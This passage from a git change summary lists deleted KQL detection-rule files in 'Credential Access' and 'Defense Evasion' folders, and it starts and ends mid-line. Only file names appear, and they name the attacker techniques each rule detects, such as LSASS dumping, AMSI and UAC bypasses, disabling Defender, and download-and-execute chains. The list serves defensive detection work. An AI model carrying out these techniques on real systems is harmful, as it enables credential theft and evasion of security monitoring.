Access/Windows_Credential_Editor_Registry.kql delete mode 100644 Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql delete mode 100644 Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql delete mode 100644 Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Defense Evasion/Abusing_Print_Executable.kql delete mode 100644 Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql delete mode 100644 Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql delete mode 100644 Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql delete mode 100644 Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_New_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql delete mode 100644 Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql delete mode 100644 Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql delete mode 100644 Defense Evasion/AgentExecutor_PowerShell_Execution.kql delete mode 100644 Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql delete mode 100644 Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql delete mode 100644 Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql delete mode 100644 Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql delete mode 100644 Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql delete mode 100644 Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql delete mode 100644 Defense Evasion/AspNetCompiler_Execution.kql delete mode 100644 Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql delete mode 100644 Defense Evasion/Atbroker_Registry_Change.kql delete mode 100644 Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql delete mode 100644 Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql delete mode 100644 Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql delete mode 100644 Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql delete mode 100644 Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql delete mode 100644 Defense Evasion/Blackbyte_Ransomware_Registry.kql delete mode 100644 Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql delete mode 100644 Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql delete mode 100644 Defense Evasion/Bypass_UAC_via_CMSTP.kql delete mode 100644 Defense Evasion/Bypass_UAC_via_WSReset.exe.kql delete mode 100644 Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql delete mode 100644 Defense Evasion/CMSTP_Execution_Process_Creation.kql delete mode 100644 Defense Evasion/CMSTP_Execution_Registry_Event.kql delete mode 100644 Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql delete mode 100644 Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql delete mode 100644 Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql delete mode 100644 Defense Evasion/Change_the_Fax_Dll.kql delete mode 100644 Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql delete mode 100644 Defense Evasion/CobaltStrike_Load_by_Rundll32.kql delete mode 100644 Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql delete mode 100644 Defense Evasion/Code_Execution_via_Pcwutl.dll.kql delete mode 100644 Defense Evasion/Control_Panel_Items.kql delete mode 100644 Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql delete mode 100644 Defense Evasion/CreateDump_Process_Dump.kql delete mode 100644 Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql delete mode 100644 Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql delete mode 100644 Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql delete mode 100644 Defense Evasion/Curl_Download_And_Execute_Combination.kql delete mode 100644 Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql delete mode 100644 Defense Evasion/DHCP_Callout_DLL_Installation.kql delete mode 100644 Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql delete mode 100644 Defense Evasion/DLL_Execution_via_Rasautou.exe.kql delete mode 100644 Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql delete mode 100644 Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql delete mode 100644 Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql delete mode 100644 Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql delete mode 100644 Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql delete mode 100644 Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql delete mode 100644 Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql delete mode 100644 Defense Evasion/DeviceCredentialDeployment_Execution.kql delete mode 100644 Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql delete mode 100644 Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql delete mode 100644 Defense Evasion/Directory_Removal_Via_Rmdir.kql delete mode 100644 Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql delete mode 100644 Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql delete mode 100644 Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql delete mode 100644 Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql delete mode 100644 Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql delete mode 100644 Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql delete mode 100644 Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql delete mode 100644 Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql delete mode 100644 Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql delete mode 100644 Defense Evasion/Disable_Windows_Firewall_by_Registry.kql delete mode 100644 Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql delete mode 100644 Defense Evasion/Disable_Windows_Security_Center_Notifications.kql delete mode 100644 Defense Evasion/Disable_of_ETW_Trace.kql delete mode 100644 Defense Evasion/Disabled_IE_Security_Features.kql delete mode 100644 Defense Evasion/Disabled_Volume_Snapshots.kql delete mode 100644 Defense Evasion/Disabled_Windows_Defender_Eventlog.kql delete mode 100644 Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql delete mode 100644 Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql delete mode 100644 Defense Evasion/Dism_Remove_Online_Package.kql delete mode 100644 Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql delete mode 100644 Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql delete mode 100644 Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql delete mode 100644 Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql delete mode 100644 Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql delete mode 100644 Defense Evasion/DumpMinitool_Execution.kql delete mode 100644 Defense Evasion/DumpStack.log_Defender_Evasion.kql delete mode 100644 Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql delete mode 100644 Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql delete mode 100644 Defense Evasion/ETW_Logging_Disabled_For_SCM.kql delete mode 100644 Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql delete mode 100644 Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql delete mode 100644 Defense Evasion/EVTX_Created_In_Uncommon_Location.kql delete mode 100644 Defense Evasion/Enable_LM_Hash_Storage.kql delete mode 100644 Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql delete mode 100644 Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql delete mode 100644 Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql delete mode 100644 Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Defense Evasion/EventLog_EVTX_File_Deleted.kql delete mode 100644 Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql delete mode 100644 Defense Evasion/Execute_Code_with_Pester.bat.kql delete mode 100644 Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql delete mode 100644 Defense Evasion/Execute_Files_with_Msdeploy.exe.kql delete mode 100644 Defense Evasion/Execute_From_Alternate_Data_Streams.kql delete mode 100644 Defense Evasion/Execute_MSDT_Via_Answer_File.kql delete mode 100644 Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql delete mode 100644 Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql delete mode 100644 Defense Evasion/Execution_Of_Non-Existing_File.kql delete mode 100644 Defense Evasion/Execution_from_Suspicious_Folder.kql delete mode 100644 Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql delete mode 100644 Defense Evasion/Execution_via_WorkFolders.exe.kql delete mode 100644 Defense Evasion/Execution_via_stordiag.exe.kql delete mode 100644 Defense Evasion/Explorer_NOUACCHECK_Flag.kql delete mode 100644 Defense Evasion/Explorer_Process_Tree_Break.kql delete mode 100644 Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql delete mode 100644 Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql delete mode 100644 Defense Evasion/File_Deletion_Via_Del.kql delete mode 100644 Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql delete mode 100644 Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql delete mode 100644 Defense Evasion/File_Download_Via_InstallUtil.EXE.kql delete mode 100644 Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql delete mode 100644 Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql delete mode 100644 Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql delete mode 100644 Defense Evasion/Findstr_Launching_.lnk_File.kql delete mode 100644 Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql delete mode 100644 Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql delete mode 100644 Defense Evasion/Fsutil_Suspicious_Invocation.kql delete mode 100644 Defense Evasion/Gpscript_Execution.kql delete mode 100644 Defense Evasion/Greedy_File_Deletion_Using_Del.kql delete mode 100644 Defense Evasion/HH.EXE_Execution.kql delete mode 100644 Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql delete mode 100644 Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql delete mode 100644 Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_EDRSilencer_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql delete mode 100644 Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql delete mode 100644 Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_PowerTool_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Stracciatella_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_WinPwn_Execution.kql delete mode 100644 Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql delete mode 100644 Defense Evasion/HackTool_-_XORDump_Execution.kql delete mode 100644 Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql delete mode 100644 Defense Evasion/Hiding_Files_with_Attrib.exe.kql delete mode 100644 Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql delete mode 100644 Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql delete mode 100644 Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql delete mode 100644 Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql delete mode 100644 Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql delete mode 100644 Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql delete mode 100644 Defense Evasion/Imports_Registry_Key_From_a_File.kql delete mode 100644 Defense Evasion/Imports_Registry_Key_From_an_ADS.kql delete mode 100644 Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql delete mode 100644 Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql delete mode 100644 Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql delete mode 100644 Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql delete mode 100644 Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql delete mode 100644 Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql delete mode 100644 Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql delete mode 100644 Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql delete mode 100644 Defense Evasion/JScript_Compiler_Execution.kql delete mode 100644 Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql delete mode 100644 Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql delete mode 100644 Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql delete mode 100644 Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Archive.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Executable.kql delete mode 100644 Defense Evasion/Legitimate_Application_Dropped_Script.kql delete mode 100644 Defense Evasion/LiveKD_Driver_Creation.kql delete mode 100644 Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql delete mode 100644 Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql delete mode 100644 Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql delete mode 100644 Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql delete mode 100644 Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql delete mode 100644 Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql delete mode 100644 Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql delete mode 100644 Defense Evasion/MSHTA_Suspicious_Execution_01.kql delete mode 100644 Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql delete mode 100644 Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql delete mode 100644 Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql delete mode 100644 Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql delete mode 100644 Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql delete mode 100644 Defense Evasion/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql delete mode 100644 Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql delete mode 100644 Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql delete mode 100644 Defense Evasion/Modification_of_IE_Registry_Settings.kql delete mode 100644 Defense Evasion/Modify_Group_Policy_Settings.kql delete mode 100644 Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql delete mode 100644 Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql delete mode 100644 Defense Evasion/MsiExec_Web_Install.kql delete mode 100644 Defense Evasion/Msiexec_Quiet_Installation.kql delete mode 100644 Defense Evasion/Msxsl.EXE_Execution.kql delete mode 100644 Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql delete mode 100644 Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql delete mode 100644 Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql delete mode 100644 Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql delete mode 100644 Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql delete mode 100644 Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql delete mode 100644 Defense Evasion/New_File_Association_Using_Exefile.kql delete mode 100644 Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/New_PortProxy_Registry_Entry_Added.kql delete mode 100644 Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql delete mode 100644 Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql delete mode 100644 Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Node_Process_Executions.kql delete mode 100644 Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql delete mode 100644 Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql delete mode 100644 Defense Evasion/NtdllPipe_Like_Activity_Execution.kql delete mode 100644 Defense Evasion/OceanLotus_Registry_Activity.kql delete mode 100644 Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql delete mode 100644 Defense Evasion/Office_Macros_Warning_Disabled.kql delete mode 100644 Defense Evasion/OilRig_APT_Registry_Persistence.kql delete mode 100644 Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql delete mode 100644 Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql delete mode 100644 Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql delete mode 100644 Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql delete mode 100644 Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql delete mode 100644 Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql delete mode 100644 Defense Evasion/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql delete mode 100644 Defense Evasion/PUA_-_CleanWipe_Execution.kql delete mode 100644 Defense Evasion/PUA_-_DefenderCheck_Execution.kql delete mode 100644 Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql delete mode 100644 Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql delete mode 100644 Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Defense Evasion/Persistence_Via_New_SIP_Provider.kql delete mode 100644 Defense Evasion/Ping_Hex_IP.kql delete mode 100644 Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Defense Evasion/Potential_7za.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql delete mode 100644 Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql delete mode 100644 Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql delete mode 100644 Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Adplus.EXE_Abuse.kql delete mode 100644 Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql delete mode 100644 Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql delete mode 100644 Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql delete mode 100644 Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql delete mode 100644 Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql delete mode 100644 Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql delete mode 100644 Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql delete mode 100644 Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql delete mode 100644 Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql delete mode 100644 Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql delete mode 100644 Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql delete mode 100644 Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql delete mode 100644 Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql delete mode 100644 Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql delete mode 100644 Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql delete mode 100644 Defense Evasion/Potential_EACore.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Edputil.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql delete mode 100644 Defense Evasion/Potential_EventLog_File_Location_Tampering.kql delete mode 100644 Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql delete mode 100644 Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql delete mode 100644 Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql delete mode 100644 Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql delete mode 100644 Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql delete mode 100644 Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql delete mode 100644 Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql delete mode 100644 Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql delete mode 100644 Defense Evasion/Potential_LethalHTA_Technique_Execution.kql delete mode 100644 Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql delete mode 100644 Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql delete mode 100644 Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Mftrace.EXE_Abuse.kql delete mode 100644 Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql delete mode 100644 Defense Evasion/Potential_MsiExec_Masquerading.kql delete mode 100644 Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql delete mode 100644 Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql delete mode 100644 Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql delete mode 100644 Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql delete mode 100644 Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete mode 100644 Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql delete mode 100644 Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql delete mode 100644 